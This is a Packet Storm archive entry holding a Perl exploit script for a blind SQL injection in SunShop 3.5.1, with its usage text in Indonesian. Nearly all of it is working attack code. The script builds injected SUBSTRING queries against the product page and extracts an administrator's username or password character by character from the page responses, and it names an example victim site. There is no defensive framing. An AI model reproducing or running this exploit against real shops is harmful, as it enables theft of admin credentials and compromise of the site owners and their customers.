sunshop-blindsql.txt

2008-05-15T00:00:00
ID PACKETSTORM:66431
Type packetstorm
Reporter irvian
Modified 2008-05-15T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -w  
use LWP::UserAgent;  
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection  
# scripts site : http://www.turnkeywebtools.com/sunshop/  
# Discovered  
# By : irvian  
# site : http://irvian.cn  
# email : irvian.info@gmail.com  
  
print "\r\n[+]-----------------------------------------[+]\r\n";  
print "[+]Blind SQL injection [+]\r\n";  
print "[+]SunShop Version 3.5.1 [+]\r\n";  
print "[+]code by irvian [+]\r\n";  
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";  
print "[+]-----------------------------------------[+]\n\r";  
if (@ARGV < 5){  
die "  
  
Cara Mengunakan : perl $0 host option id tabel itemid  
  
Keterangan  
host : http://victim.com  
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password  
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst  
tabel : Isi Kolom tabel biasanya admin atau ss_admin  
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=  
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10  
\n";}  
  
  
$url = $ARGV[0];  
$option = $ARGV[1];  
$id = $ARGV[2];  
$tabel = $ARGV[3];  
$itemid = $ARGV[4];  
  
if ($option eq 1){  
syswrite(STDOUT, "username: ", 10);}  
elsif ($option eq 2){  
syswrite(STDOUT, "password: ", 10);}  
  
for($i = 1; $i <= 32; $i++){  
$f = 0;  
$n = 32;  
while(!$f && $n <= 57)  
{  
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){  
$f = 1;  
syswrite(STDOUT, chr($n), 1);  
}  
$n++;  
}  
if ($f==0){  
$n = 97;  
while(!$f && $n <= 122)  
{  
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){  
$f = 1;  
syswrite(STDOUT, chr($n), 1);  
}  
$n++;  
}  
}  
}  
print "\n[+]finish Execution Exploit\n";  
  
sub blind {  
my $site = $_[0];  
my $op = $_[1];  
my $id = $_[2];  
my $tbl = $_[3];  
my $i = $_[4];  
my $n = $_[5];  
my $item = $_[6];  
  
if ($op eq 1){  
$klm = "username";  
}  
elsif ($op eq 2){  
$klm = "password";  
}  
my $ua = LWP::UserAgent->new;  
my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";  
my $res = $ua->get($url);  
my $browser = $res->content;  
if ($browser !~ /This product is currently not viewable/i){  
return 1;  
}  
else {  
return 0;  
}  
  
}  
`